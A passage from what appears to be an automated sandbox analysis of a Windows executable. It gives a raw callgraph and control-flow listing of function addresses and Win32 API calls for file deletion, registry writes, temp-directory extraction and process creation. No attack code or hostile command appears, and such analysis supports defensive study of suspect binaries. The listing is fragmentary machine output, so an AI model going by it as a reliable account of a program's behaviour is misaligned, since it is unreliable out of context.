c24cb 2531->2532 2535 c23b9 2531->2535 2533 c6ce0 4 API calls 2532->2533 2534 c24dc 2533->2534 2534->2416 2535->2532 2536 c23e9 FindFirstFileA 2535->2536 2536->2532 2544 c2407 2536->2544 2537 c2479 2541 c2488 SetFileAttributesA DeleteFileA 2537->2541 2538 c2421 lstrcmpA 2539 c24a9 FindNextFileA 2538->2539 2540 c2431 lstrcmpA 2538->2540 2542 c24bd FindClose RemoveDirectoryA 2539->2542 2539->2544 2540->2539 2540->2544 2541->2539 2542->2532 2543 c658a CharPrevA 2543->2544 2544->2537 2544->2538 2544->2539 2544->2543 2545 c2390 5 API calls 2544->2545 2545->2544 2550 c3737 2546->2550 2551 c372d 2546->2551 2547 c44b9 20 API calls 2560 c39fc 2547->2560 2548 c6ce0 4 API calls 2549 c2e92 2548->2549 2549->2396 2549->2416 2561 c18a3 2549->2561 2550->2551 2552 c38a4 2550->2552 2550->2560 2597 c28e8 2550->2597 2551->2547 2551->2560 2552->2551 2554 c39c1 MessageBeep 2552->2554 2552->2560 2555 c681f 10 API calls 2554->2555 2556 c39ce 2555->2556 2557 c39d8 MessageBoxA 2556->2557 2558 c67c9 EnumResourceLanguagesA 2556->2558 2557->2560 2558->2557 2560->2548 2562 c19b8 2561->2562 2563 c18d5 2561->2563 2564 c6ce0 4 API calls 2562->2564 2626 c17ee LoadLibraryA 2563->2626 2566 c19d5 2564->2566 2566->2416 2566->2429 2568 c18e5 GetCurrentProcess OpenProcessToken 2568->2562 2569 c1900 GetTokenInformation 2568->2569 2570 c1918 GetLastError 2569->2570 2571 c19aa CloseHandle 2569->2571 2570->2571 2572 c1927 LocalAlloc 2570->2572 2571->2562 2573 c1938 GetTokenInformation 2572->2573 2574 c19a9 2572->2574 2575 c194e AllocateAndInitializeSid 2573->2575 2576 c19a2 LocalFree 2573->2576 2574->2571 2575->2576 2580 c196e 2575->2580 2576->2574 2577 c1999 FreeSid 2577->2576 2578 c1975 EqualSid 2579 c198c 2578->2579 2578->2580 2579->2577 2580->2577 2580->2578 2580->2579 2582 c66d5 2581->2582 2583 c66f3 2582->2583 2585 c66e5 CharNextA 2582->2585 2593 c6648 2582->2593 2583->2511 2585->2582 2587 c659b 2586->2587 2587->2587 2588 c65ab 2587->2588 2589 c65b8 CharPrevA 2587->2589 2588->2514 2589->2588 2596 c6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2590->2596 2592 c621d 2594 c665d IsDBCSLeadByte 2593->2594 2595 c6668 2593->2595 2594->2595 2595->2582 2596->2592 2598 c2a62 2597->2598 2605 c290d 2597->2605 2599 c2a6e GlobalFree 2598->2599 2600 c2a75 2598->2600 2599->2600 2600->2552 2602 c2955 GlobalAlloc 2602->2598 2603 c2968 GlobalLock 2602->2603 2603->2598 2603->2605 2604 c2a20 GlobalUnlock 2604->2605 2605->2598 2605->2602 2605->2604 2606 c2a80 GlobalUnlock 2605->2606 2607 c2773 2605->2607 2606->2598 2608 c28b2 2607->2608 2609 c27a3 CharUpperA CharNextA CharNextA 2607->2609 2611 c28b7 GetSystemDirectoryA 2608->2611 2610 c27db 2609->2610 2609->2611 2612 c28a8 GetWindowsDirectoryA 2610->2612 2613 c27e3 2610->2613 2614 c28bf 2611->2614 2612->2614 2619 c658a CharPrevA 2613->2619 2615 c28d2 2614->2615 2616 c658a CharPrevA 2614->2616 2617 c6ce0 4 API calls 2615->2617 2616->2615 2618 c28e2 2617->2618 2618->2605 2620 c2810 RegOpenKeyExA 2619->2620 2620->2614 2621 c2837 RegQueryValueExA 2620->2621 2622 c285c 2621->2622 2623 c289a RegCloseKey 2621->2623 2624 c2867 ExpandEnvironmentStringsA 2622->2624 2625 c287a 2622->2625 2623->2614 2624->2625 2625->2623 2627 c1826 GetProcAddress 2626->2627 2628 c1890 2626->2628 2629 c1889 FreeLibrary 2627->2629 2630 c1839 AllocateAndInitializeSid 2627->2630 2631 c6ce0 4 API calls 2628->2631 2629->2628 2630->2629 2633 c185f FreeSid 2630->2633 2632 c189f 2631->2632 2632->2562 2632->2568 2633->2629 2636 c468f 7 API calls 2635->2636 2637 c51f9 LocalAlloc 2636->2637 2638 c522d 2637->2638 2639 c520d 2637->2639 2641 c468f 7 API calls 2638->2641 2640 c44b9 20 API calls 2639->2640 2642 c521e 2640->2642 2643 c523a 2641->2643 2644 c6285 GetLastError 2642->2644 2645 c523e 2643->2645 2646 c5262 lstrcmpA 2643->2646 2653 c2f4d 2644->2653 2649 c44b9 20 API calls 2645->2649 2647 c527e 2646->2647 2648 c5272 LocalFree 2646->2648 2650 c44b9 20 API calls 2647->2650 2648->2653 2651 c524f LocalFree 2649->2651 2652 c5290 LocalFree 2650->2652 2651->2653 2652->2653 2653->2431 2653->2433 2653->2440 2655 c468f 7 API calls 2654->2655 2656 c5175 2655->2656 2657 c517a 2656->2657 2658 c51af 2656->2658 2659 c44b9 20 API calls 2657->2659 2660 c468f 7 API calls 2658->2660 2661 c518d 2659->2661 2662 c51c0 2660->2662 2661->2437 2816 c6298 2662->2816 2665 c51e1 2665->2437 2666 c44b9 20 API calls 2666->2661 2668 c468f 7 API calls 2667->2668 2669 c55c7 LocalAlloc 2668->2669 2670 c55fd 2669->2670 2671 c55db 2669->2671 2673 c468f 7 API calls 2670->2673 2672 c44b9 20 API calls 2671->2672 2674 c55ec 2672->2674 2675 c560a 2673->2675 2676 c6285 GetLastError 2674->2676 2677 c560e 2675->2677 2678 c5632 lstrcmpA 2675->2678 2701 c55f1 2676->2701 2681 c44b9 20 API calls 2677->2681 2679 c564b LocalFree 2678->2679 2680 c5645 2678->2680 2684 c5696 2679->2684 2685 c565b 2679->2685 2680->2679 2682 c561f LocalFree 2681->2682 2682->2701 2683 c589f 2686 c6517 24 API calls 2683->2686 2684->2683 2688 c56ae GetTempPathA 2684->2688 2689 c5467 49 API calls 2685->2689 2686->2701 2687 c6ce0 4 API calls 2690 c2f7e 2687->2690 2691 c56eb 2688->2691 2692 c56c3 2688->2692 2693 c5678 2689->2693 2690->2440 2690->2444 2697 c586c GetWindowsDirectoryA 2691->2697 2698 c5717 GetDriveTypeA 2691->2698 2691->2701 2828 c5467 2692->2828 2696 c44b9 20 API calls 2693->2696 2693->2701 2696->2701 2862 c597d GetCurrentDirectoryA SetCurrentDirectoryA 2697->2862 2702 c5730 GetFileAttributesA 2698->2702 2713 c572b 2698->2713 2701->2687 2702->2713 2704 c597d 34 API calls 2704->2713 2705 c5467 49 API calls 2705->2691 2706 c2630 21 API calls 2706->2713 2708 c57c1 GetWindowsDirectoryA 2708->2713 2709 c658a CharPrevA 2710 c57e8 GetFileAttributesA 2709->2710 2711 c57fa CreateDirectoryA 2710->2711 2710->2713 2711->2713 2712 c5827 SetFileAttributesA 2712->2713 2713->2697 2713->2698 2713->2701 2713->2702 2713->2704 2713->2706 2713->2708 2713->2709 2713->2712 2714 c5467 49 API calls 2713->2714 2858 c6952 2713->2858 2714->2713 2716 c6268 2715->2716 2717 c6249 2715->2717 2718 c597d 34 API calls 2716->2718 2719 c44b9 20 API calls 2717->2719 2724 c625f 2718->2724 2720 c625a 2719->2720 2722 c6285 GetLastError 2720->2722 2721 c6ce0 4 API calls 2723 c3013 2721->2723 2722->2724 2723->2440 2723->2452 2724->2721 2726 c3b2d 2725->2726 2726->2726 2727 c3b72 2726->2727 2729 c3b53 2726->2729 2928 c4fe0 2727->2928 2731 c6517 24 API calls 2729->2731 2730 c3b70 2732 c6298 10 API calls 2730->2732 2733 c3b7b 2730->2733 2731->2730 2732->2733 2733->2457 2735 c2622 2734->2735 2736 c2583 2734->2736 2955 c24e0 GetWindowsDirectoryA 2735->2955 2738 c25e8 RegOpenKeyExA 2736->2738 2739 c258b 2736->2739 2740 c2609 RegQueryInfoKeyA 2738->2740 2741 c25e3 2738->2741 2739->2741 2743 c259b RegOpenKeyExA 2739->2743 2742 c25d1 RegCloseKey 2740->2742 2741->2462 2742->2741 2743->2741 2744 c25bc RegQueryValueExA 2743->2744 2744->2742 2746 c3bdb 2745->2746 2750 c3bec 2745->2750 2747 c468f 7 API calls 2746->2747 2747->2750 2748 c3c03 memset 2748->2750 2749 c3d13 2752 c44b9 20 API calls 2749->2752 2750->2748 2750->2749 2751 c468f 7 API calls 2750->2751 2753 c3d26 2750->2753 2757 c3d7b CompareStringA 2750->2757 2758 c3fd7 2750->2758 2759 c3fab 2750->2759 2763 c3f1e LocalFree 2750->2763 2764 c3f46 LocalFree 2750->2764 2768 c3cc7 CompareStringA 2750->2768 2779 c3e10 2750->2779 2963 c1ae8 2750->2963 3004 c202a memset memset RegCreateKeyExA 2750->3004 3030 c3fef 2750->3030 2751->2750 2752->2753 2755 c6ce0 4 API calls 2753->2755 2756 c3f60 2755->2756 2756->2464 2757->2750 2757->2758 2758->2753 3054 c2267 2758->3054 2762 c44b9 20 API calls 2759->2762 2766 c3fbe LocalFree 2762->2766 2763->2750 2763->2758 2764->2753 2766->2753 2768->2750 2769 c3e1f GetProcAddress 2771 c3f64 2769->2771 2769->2779 2770 c3f92 2772 c44b9 20 API calls 2770->2772 2774 c44b9 20 API calls 2771->2774 2773 c3fa9 2772->2773 2775 c3f7c LocalFree 2773->2775 2776 c3f75 FreeLibrary 2774->2776 2777 c6285 GetLastError 2775->2777 2776->2775 2778 c3f8b 2777->2778 2778->2753 2779->2769 2779->2770 2780 c3eff FreeLibrary 2779->2780 2781 c3f40 FreeLibrary 2779->2781 3044 c6495 2779->3044 2780->2763 2781->2764 2783 c468f 7 API calls 2782->2783 2784 c3a55 LocalAlloc 2783->2784 2785 c3a6c 2784->2785 2786 c3a8e 2784->2786 2787 c44b9 20 API calls 2785->2787 2788 c468f 7 API calls 2786->2788 2789 c3a7d 2787->2789 2790 c3a98 2788->2790 2791 c6285 GetLastError 2789->2791 2792 c3a9c 2790->2792 2793 c3ac5 lstrcmpA 2790->2793 2798 c2f64 2791->2798 2796 c44b9 20 API calls 2792->2796 2794 c3b0d LocalFree 2793->2794 2795 c3ada 2793->2795 2794->2798 2797 c6517 24 API calls 2795->2797 2799 c3aad LocalFree 2796->2799 2800 c3aec LocalFree 2797->2800 2798->2431 2798->2440 2799->2798 2800->2798 2802 c628f 2801->2802 2802->2440 2804 c468f 7 API calls 2803->2804 2805 c417d LocalAlloc 2804->2805 2806 c41a8 2805->2806 2807 c4195 2805->2807 2809 c468f 7 API calls 2806->2809 2808 c44b9 20 API calls 2807->2808 2810 c41a6 2808->2810 2811 c41b5 2809->2811 2810->2440 2812 c41b9 2811->2812 2813 c41c5 lstrcmpA 2811->2813 2815 c44b9 20 API calls 2812->2815 2813->2812 2814 c41e6 LocalFree 2813->2814 2814->2810 2815->2814 2817 c171e _vsnprintf 2816->2817 2827 c62c9 FindResourceA 2817->2827 2819 c62cb LoadResource LockResource 2820 c6353 2819->2820 2823 c62e0 2819->2823 2821 c6ce0 4 API calls 2820->2821 2822 c51ca 2821->2822 2822->2665 2822->2666 2824 c631b FreeResource 2823->2824 2825 c6355 FreeResource 2823->2825 2826 c171e _vsnprintf 2824->2826 2825->2820 2826->2827 2827->2819 2827->2820 2829 c548a 2828->2829 2847 c551a 2828->2847 2888 c53a1 2829->2888 2831 c5581 2835 c6ce0 4 API calls 2831->2835 2834 c5495 2834->2831 2840 c550c 2834->2840 2841 c54c2 GetSystemInfo 2834->2841 2842 c559a 2835->2842 2836 c554d 2836->2831 2843 c597d 34 API calls 2836->2843 2837 c553b CreateDirectoryA 2838 c5577 2837->2838 2839 c5547 2837->2839 2844 c6285 GetLastError 2838->2844 2839->2836 2845 c658a CharPrevA 2840->2845 2848 c54da 2841->2848 2842->2701 2852 c2630 GetWindowsDirectoryA 2842->2852 2849 c555c 2843->2849 2846 c557c 2844->2846 2845->2847 2846->2831 2899 c58c8 2847->2899 2848->2840 2850 c658a CharPrevA 2848->2850 2849->2831 2851 c5568 RemoveDirectoryA 2849->2851 2850->2840 2851->2831 2853 c265e 2852->2853 2854 c266f 2852->2854 2855 c44b9 20 API calls 2853->2855 2856 c6ce0 4 API calls 2854->2856 2855->2854 2857 c2687 2856->2857 2857->2691 2857->2705 2859 c696e GetDiskFreeSpaceA 2858->2859 2860 c69a1 2858->2860 2859->2860 2861 c6989 MulDiv 2859->2861 2860->2713 2861->2860 2863 c59dd GetDiskFreeSpaceA 2862->2863 2864 c59bb 2862->2864 2866 c5ba1 memset 2863->2866 2867 c5a21 MulDiv 2863->2867 2865 c44b9 20 API calls 2864->2865 2868 c59cc 2865->2868 2869 c6285 GetLastError 2866->2869 2867->2866 2870 c5a50 GetVolumeInformationA 2867->2870 2871 c6285 GetLastError 2868->2871 2872 c5bbc GetLastError FormatMessageA 2869->2872 2873 c5a6e memset 2870->2873 2874 c5ab5 SetCurrentDirectoryA 2870->2874 2875 c59d1 2871->2875 2876 c5be3 2872->2876 2877 c6285 GetLastError 2873->2877 2883 c5acc 2874->2883 2881 c6ce0 4 API calls 2875->2881 2878 c44b9 20 API calls 2876->2878 2879 c5a89 GetLastError FormatMessageA 2877->2879 2880 c5bf5 SetCurrentDirectoryA 2878->2880 2879->2876 2880->2875 2882 c5c11 2881->2882 2882->2691 2884 c5b0a 2883->2884 2886 c5b20 2883->2886 2885 c44b9 20 API calls 2884->2885 2885->2875 2886->2875 2911 c268b 2886->2911 2890 c53bf 2888->2890 2889 c171e _vsnprintf 2889->2890 2890->2889 2891 c658a CharPrevA 2890->2891 2894 c5415 GetTempFileNameA 2890->2894 2892 c53fa RemoveDirectoryA GetFileAttributesA 2891->2892 2892->2890 2893 c544f CreateDirectoryA 2892->2893 2893->2894 2896 c543a 2893->2896 2895 c5429 DeleteFileA CreateDirectoryA 2894->2895 2894->2896 2895->2896 2897 c6ce0 4 API calls 2896->2897 2898 c5449 2897->2898 2898->2834 2900 c58d8 2899->2900 2900->2900 2901 c58df LocalAlloc 2900->2901 2902 c58f3 2901->2902 2905 c5919 2901->2905 2903 c44b9 20 API calls 2902->2903 2904 c5906 2903->2904 2907 c6285 GetLastError 2904->2907 2909 c5534 2904->2909 2906 c658a CharPrevA 2905->2906 2908 c5931 CreateFileA LocalFree 2906->2908 2907->2909 2908->2904 2910 c595b CloseHandle GetFileAttributesA 2908->2910 2909->2836 2909->2837 2910->2904 2912 c26b9 2911->2912 2913 c26e5 2911->2913 2916 c171e _vsnprintf 2912->2916 2914 c271f 2913->2914 2915 c26ea 2913->2915 2919 c26e3 2914->2919 2923 c171e _vsnprintf 2914->2923 2918 c171e _vsnprintf 2915->2918 2917 c26cc 2916->2917 2920 c44b9 20 API calls 2917->2920 2922 c26fd 2918->2922 2921 c6ce0 4 API calls 2919->2921 2920->2919 2924 c276d 2921->2924 2925 c44b9 20 API calls 2922->2925 2926 c2735 2923->2926 2924->2875 2925->2919 2927 c44b9 20 API calls 2926->2927 2927->2919 2929 c468f 7 API calls 2928->2929 2930 c4ff5 FindResourceA LoadResource LockResource 2929->2930 2931 c5020 2930->2931 2944 c515f 2930->2944 2932 c5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2931->2932 2933 c5057 2931->2933 2932->2933 2947 c4efd 2933->2947 2936 c5060 2937 c44b9 20 API calls 2936->2937 2943 c5075 2937->2943 2938 c511d 2941 c513a 2938->2941 2945 c44b9 20 API calls 2938->2945 2939 c5110 FreeResource 2939->2938 2940 c44b9 20 API calls 2940->2943 2941->2944 2946 c514c SendMessageA 2941->2946 2942 c507c 2942->2940 2942->2943 2943->2938 2943->2939 2944->2730 2945->2941 2946->2944 2948 c4f4a 2947->2948 2949 c4fa1 2948->2949 2950 c4980 25 API calls 2948->2950 2951 c6ce0 4 API calls 2949->2951 2953 c4f67 2950->2953 2952 c4fc6 2951->2952 2952->2936 2952->2942 2953->2949 2954 c4b60 FindCloseChangeNotification 2953->2954 2954->2949 2956 c255b 2955->2956 2957 c2510 2955->2957 2958 c6ce0 4 API calls 2956->2958 2959 c658a CharPrevA 2957->2959 2960 c2569 2958->2960 2961 c2522 WritePrivateProfileStringA _lopen 2959->2961 2960->2741 2961->2956 2962 c2548 _llseek _lclose 2961->2962 2962->2956 2964 c1b25 2963->2964 3068 c1a84 2964->3068 2966 c1b57 2967 c658a CharPrevA 2966->2967 2968 c1b8c 2966->2968 2967->2968 2969 c66c8 2 API calls 2968->2969 2970 c1bd1 2969->2970 2971 c1bd9 CompareStringA 2970->2971 2972 c1d73 2970->2972 2971->2972 2974 c1bf7 GetFileAttributesA 2971->2974 2973 c66c8 2 API calls 2972->2973 2977 c1d7d 2973->2977 2975 c1c0d 2974->2975 2976 c1d53 2974->2976 2975->2976 2981 c1a84 2 API calls 2975->2981 2980 c1d64 2976->2980 2978 c1df8 LocalAlloc 2977->2978 2979 c1d81 CompareStringA 2977->2979 2978->2980 2982 c1e0b GetFileAttributesA 2978->2982 2979->2978 2988 c1d9b 2979->2988 2983 c44b9 20 API calls 2980->2983 2984 c1c31 2981->2984 2985 c1e45 2982->2985 2991 c1e1d 2982->2991 2986 c1d6c 2983->2986 2987 c1c50 LocalAlloc 2984->2987 2992 c1a84 2 API calls 2984->2992 3074 c2aac 2985->3074 2990 c6ce0 4 API calls 2986->2990 2987->2980 2989 c1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2987->2989 2988->2988 2993 c1dbe LocalAlloc 2988->2993 2998 c1cf8 2989->2998 3002 c1cc2 2989->3002 2996 c1ea1 2990->2996 2991->2985 2992->2987 2993->2980 2997 c1de1 2993->2997 2996->2750 3001 c171e _vsnprintf 2997->3001 2999 c1d09 GetShortPathNameA 2998->2999 3000 c1d23 2998->3000 2999->3000 3003 c171e _vsnprintf 3000->3003 3001->3002 3002->2986 3003->3002 3005 c209a 3004->3005 3013 c2256 3004->3013 3007 c171e _vsnprintf 3005->3007 3010 c20dc 3005->3010 3006 c6ce0 4 API calls 3008 c2263 3006->3008 3009 c20af RegQueryValueExA 3007->3009 3008->2750 3009->3005 3009->3010 3011 c20fb GetSystemDirectoryA 3010->3011 3012 c20e4 RegCloseKey 3010->3012 3014 c658a CharPrevA 3011->3014 3012->3013 3013->3006 3015 c211b LoadLibraryA 3014->3015 3016 c212e GetProcAddress FreeLibrary 3015->3016 3017 c2179 GetModuleFileNameA 3015->3017 3016->3017 3018 c214e GetSystemDirectoryA 3016->3018 3019 c21de RegCloseKey 3017->3019 3022 c2177 3017->3022 3020 c2165 3018->3020 3018->3022 3019->3013 3021 c658a CharPrevA 3020->3021 3021->3022 3022->3022 3023 c21b7 LocalAlloc 3022->3023 3024 c21ec 3023->3024 3025 c21cd 3023->3025 3027 c171e _vsnprintf 3024->3027 3026 c44b9 20 API calls 3025->3026 3026->3019 3028 c2218 RegSetValueExA RegCloseKey LocalFree 3027->3028 3028->3013 3031 c4106 3030->3031 3032 c4016 CreateProcessA 3030->3032 3035 c6ce0 4 API calls 3031->3035 3033 c40c4 3032->3033 3034 c4041 WaitForSingleObject GetExitCodeProcess 3032->3034 3037 c6285 GetLastError 3033->3037 3042 c4070 3034->3042 3036 c4117 3035->3036 3036->2750 3039 c40c9 GetLastError FormatMessageA 3037->3039 3041 c44b9 20 API calls 3039->3041 3040 c4096 CloseHandle CloseHandle 3040->3031 3043 c40ba 3040->3043 3041->3031 3101 c411b 3042->3101 3043->3031 3045 c64c2 3044->3045 3046 c658a CharPrevA 3045->3046 3047 c64d8 GetFileAttributesA 3046->3047 3048 c64ea 3047->3048 3049 c6501 LoadLibraryA 3047->3049 3048->3049 3050 c64ee LoadLibraryExA 3048->3050 3051 c6508 3049->3051 3050->3051 3052 c6ce0 4 API calls 3051->3052 3053 c6513 3052->3053 3053->2779 3055 c2289 RegOpenKeyExA 3054->3055 3056 c2381 3054->3056 3055->3056 3057 c22b1 RegQueryValueExA 3055->3057 3058 c6ce0 4 API calls 3056->3058 3059 c2374 RegCloseKey 3057->3059 3060 c22e6 memset GetSystemDirectoryA 3057->3060 3061 c238c 3058->3061 3059->3056 3062 c230f 3060->3062 3063 c2321 3060->3063 3061->2753 3064 c658a CharPrevA 3062->3064 3065 c171e _vsnprintf 3063->3065 3064->3063 3066 c233f RegSetValueExA 3065->3066 3066->3059 3070 c1a9a 3068->3070 3071 c1aba 3070->3071 3072 c1aaf 3070->3072 3087 c667f 3070->3087 3071->2966 3072->3071 3073 c667f 2 API calls 3072->3073 3073->3072 3075 c2be6 3074->3075 3076 c2ad4 GetModuleFileNameA 3074->3076 3077 c6ce0 4 API calls 3075->3077 3086 c2b02 3076->3086 3079 c2bf5 3077->3079 3078 c2af1 IsDBCSLeadByte 3078->3086 3079->2986 3080 c2bca CharNextA 3082 c2bd3 CharNextA 3080->3082 3081 c2b11 CharNextA CharUpperA 3083 c2b8d CharUpperA 3081->3083 3081->3086 3082->3086 3083->3086 3085 c2b43 CharPrevA 3085->3086 3086->3075 3086->3078 3086->3080 3086->3081 3086->3082 3086->3085 3086->3086 3092 c65e8 3086->3092 3088 c6689 3087->3088 3089 c66a5 3088->3089 3090 c6648 IsDBCSLeadByte 3088->3090 3091 c6697 CharNextA 3088->3091 3089->3070 3090->3088 3091->3088 3093 c65f4 3092->3093 3093->3093 3094 c65fb CharPrevA 3093->3094 3095 c6611 CharPrevA 3094->3095 3096 c661e 3095->3096 3097 c660b 3095->3097 3098 c663d 3096->3098 3099 c6634 CharNextA 3096->3099 3100 c6627 CharPrevA 3096->3100 3097->3095 3097->3096 3098->3086 3099->3098 3100->3098 3100->3099 3102 c4132 3101->3102 3104 c412a 3101->3104 3105 c1ea7 3102->3105 3104->3040 3106 c1ed3 3105->3106 3107 c1eba 3105->3107 3106->3104 3108 c256d 15 API calls 3107->3108 3108->3106 3110 c2026 3109->3110 3111 c1ff0 RegOpenKeyExA 3109->3111 3110->2473 3111->3110 3112 c200f RegDeleteValueA RegCloseKey 3111->3112 3112->3110 3219 c6a20 __getmainargs 3220 c19e0 3221 c1a24 GetDesktopWindow 3220->3221 3222 c1a03 3220->3222 3224 c43d0 11 API calls 3221->3224 3223 c1a20 3222->3223 3225 c1a16 EndDialog 3222->3225 3227 c6ce0 4 API calls 3223->3227 3226 c1a33 LoadStringA SetDlgItemTextA MessageBeep 3224->3226 3225->3223 3226->3223 3228 c1a7e 3227->3228 3229 c6fbe GetModuleHandleW 3230 c6fcf 3229->3230 3231 c69b8 __p__fmode __p__commode 3232 c69f9 3231->3232 3233 c6a0e 3232->3233 3234 c6a02 __setusermatherr 3232->3234 3237 c71ef _controlfp 3233->3237 3234->3233 3236 c6a13 3237->3236 3238 c7270 _except_handler4_common 3239 c34f0 3240 c3504 3239->3240 3241 c35b8 3239->3241 3240->3241 3242 c35be GetDesktopWindow 3240->3242 3243 c351b 3240->3243 3244 c3526 3241->3244 3247 c3671 EndDialog 3241->3247 3248 c43d0 11 API calls 3242->3248 3245 c354f 3243->3245 3246 c351f 3243->3246 3245->3244 3251 c3559 ResetEvent 3245->3251 3246->3244 3250 c352d TerminateThread EndDialog 3246->3250 3247->3244 3249 c35d6 3248->3249 3252 c361d SetWindowTextA CreateThread 3249->3252 3253 c35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3249->3253 3250->3244 3254 c44b9 20 API calls 3251->3254 3252->3244 3255 c3646 3252->3255 3253->3252 3258 c3581 3254->3258 3256 c44b9 20 API calls 3255->3256 3256->3241 3257 c359b SetEvent 3260 c3680 4 API calls 3257->3260 3258->3257 3259 c358a SetEvent 3258->3259 3259->3244 3260->3241 3261 c6ef0 3262 c6f2d 3261->3262 3264 c6f02 3261->3264 3263 c6f27 ?terminate@ 3263->3262 3264->3262 3264->3263

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_000C490C 1 Function_000C7208 2 Function_000C6404 3 Function_000C7000 4 Function_000C4200 5 Function_000C3100 96 Function_000C43D0 5->96 6 Function_000C4702 59 Function_000C1680 6->59 86 Function_000C16B3 6->86 7 Function_000C6C03 28 Function_000C724D 7->28 8 Function_000C2F1D 10 Function_000C621E 8->10 21 Function_000C3B26 8->21 24 Function_000C3A3F 8->24 36 Function_000C256D 8->36 38 Function_000C4169 8->38 39 Function_000C5164 8->39 54 Function_000C658A 8->54 57 Function_000C6285 8->57 76 Function_000C55A0 8->76 79 Function_000C3BA2 8->79 84 Function_000C44B9 8->84 106 Function_000C51E5 8->106 109 Function_000C6CE0 8->109 9 Function_000C171E 46 Function_000C597D 10->46 10->57 10->84 10->109 11 Function_000C681F 11->109 116 Function_000C66F9 11->116 12 Function_000C411B 74 Function_000C1EA7 12->74 13 Function_000C5C17 14 Function_000C6517 14->84 15 Function_000C3210 19 Function_000C4224 15->19 15->46 15->54 15->84 87 Function_000C58C8 15->87 15->96 16 Function_000C7010 17 Function_000C6E2A 118 Function_000C6CF0 17->118 18 Function_000C202A 18->9 18->54 18->84 18->109 19->59 19->84 20 Function_000C6425 20->109 21->14 64 Function_000C6298 21->64 107 Function_000C4FE0 21->107 22 Function_000C7120 23 Function_000C6A20 24->14 52 Function_000C468F 24->52 24->57 24->84 25 Function_000C6C3F 26 Function_000C4C37 27 Function_000C2630 27->84 27->109 29 Function_000C6648 30 Function_000C6F40 31 Function_000C6F54 31->1 31->28 32 Function_000C7155 33 Function_000C4A50 34 Function_000C3450 34->96 35 Function_000C6952 108 Function_000C24E0 36->108 37 Function_000C476D 37->14 71 Function_000C66AE 37->71 38->52 38->84 39->52 39->64 39->84 40 Function_000C5467 40->46 40->54 40->57 40->59 62 Function_000C1781 40->62 77 Function_000C53A1 40->77 40->87 40->109 41 Function_000C2267 41->9 41->54 41->109 42 Function_000C4B60 43 Function_000C6A60 43->1 43->25 43->28 43->32 44 Function_000C7060 43->44 117 Function_000C2BFB 43->117 44->16 44->22 45 Function_000C6760 55 Function_000C268B 46->55 46->57 46->84 46->109 47 Function_000C667F 47->29 48 Function_000C487A 48->0 49 Function_000C7270 50 Function_000C6C70 51 Function_000C2773 51->54 51->59 51->62 51->109 53 Function_000C2A89 54->86 55->9 55->84 55->109 56 Function_000C1A84 56->47 58 Function_000C4980 58->48 58->84 59->62 60 Function_000C3680 61 Function_000C6380 63 Function_000C5C9E 63->13 63->17 63->47 63->54 63->59 63->84 88 Function_000C66C8 63->88 63->109 110 Function_000C31E0 63->110 64->9 64->109 65 Function_000C4E99 65->59 66 Function_000C6495 66->54 66->62 66->109 67 Function_000C2390 67->54 67->59 67->67 67->86 67->109 68 Function_000C1F90 68->74 68->84 68->109 69 Function_000C6793 70 Function_000C2AAC 70->59 89 Function_000C17C8 70->89 104 Function_000C65E8 70->104 70->109 72 Function_000C2CAA 72->14 72->52 72->63 72->67 81 Function_000C18A3 72->81 72->84 97 Function_000C36EE 72->97 72->109 73 Function_000C6FA5 73->28 74->36 75 Function_000C4CA0 76->14 76->27 76->35 76->40 76->46 76->52 76->54 76->57 76->62 76->84 76->109 77->9 77->54 77->59 77->109 78 Function_000C6FA1 79->18 79->41 79->52 79->57 79->62 79->66 79->84 99 Function_000C3FEF 79->99 102 Function_000C1AE8 79->102 79->109 80 Function_000C72A2 98 Function_000C17EE 81->98 81->109 82 Function_000C6FBE 82->31 83 Function_000C69B8 83->3 100 Function_000C71EF 83->100 84->9 84->11 84->59 90 Function_000C67C9 84->90 84->109 85 Function_000C52B6 85->62 85->67 85->104 85->109 113 Function_000C1FE1 85->113 86->62 87->54 87->57 87->59 87->84 88->29 90->69 91 Function_000C4CC0 92 Function_000C4BC0 93 Function_000C30C0 94 Function_000C4AD0 94->60 95 Function_000C4CD0 95->6 95->26 95->37 95->42 95->58 95->65 95->109 111 Function_000C47E0 95->111 96->109 97->11 97->53 97->84 97->90 103 Function_000C28E8 97->103 97->109 98->109 99->12 99->57 99->84 99->109 101 Function_000C6BEF 102->9 102->54 102->56 102->59 102->62 102->70 102->84 102->86 102->88 102->109 103->51 103->53 105 Function_000C70EB 106->52 106->57 106->84 107->52 107->84 114 Function_000C4EFD 107->114 108->54 108->109 109->118 111->59 111->84 112 Function_000C19E0 112->96 112->109 114->42 114->58 114->109 115 Function_000C70FE 117->8 117->68 117->72 117->85 119 Function_000C34F0 119->60 119->84 119->96 120 Function_000C6EF0

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 c3ba2-c3bd9 37 c3bfd-c3bff 36->37 38 c3bdb-c3bee call c468f 36->38 40 c3c03-c3c28 memset 37->40 44 c3bf4-c3bf7 38->44 45 c3d13-c3d30 call c44b9 38->45 42 c3c2e-c3c40 call c468f 40->42 43 c3d35-c3d48 call c1781 40->43 42->45 54 c3c46-c3c49 42->54 49 c3d4d-c3d52 43->49 44->37 44->45 55 c3f4d 45->55 52 c3d9e-c3db6 call c1ae8 49->52 53 c3d54-c3d6c call c468f 49->53 52->55 69 c3dbc-c3dc2 52->69 53->45 65 c3d6e-c3d75 53->65 54->45 57 c3c4f-c3c56 54->57 59 c3f4f-c3f63 call c6ce0 55->59 61 c3c58-c3c5e 57->61 62 c3c60-c3c65 57->62 66 c3c6e-c3c73 61->66 67 c3c75-c3c7c 62->67 68 c3c67-c3c6d 62->68 71 c3fda-c3fe1 65->71 72 c3d7b-c3d98 CompareStringA 65->72 73 c3c87-c3c89 66->73 67->73 76 c3c7e-c3c82 67->76 68->66 74 c3dc4-c3dce 69->74 75 c3de6-c3de8 69->75 80 c3fe8-c3fea 71->80 81 c3fe3 call c2267 71->81 72->52 72->71 73->49 77 c3c8f-c3c98 73->77 74->75 82 c3dd0-c3dd7 74->82 78 c3dee-c3df5 75->78 79 c3f0b-c3f15 call c3fef 75->79 76->73 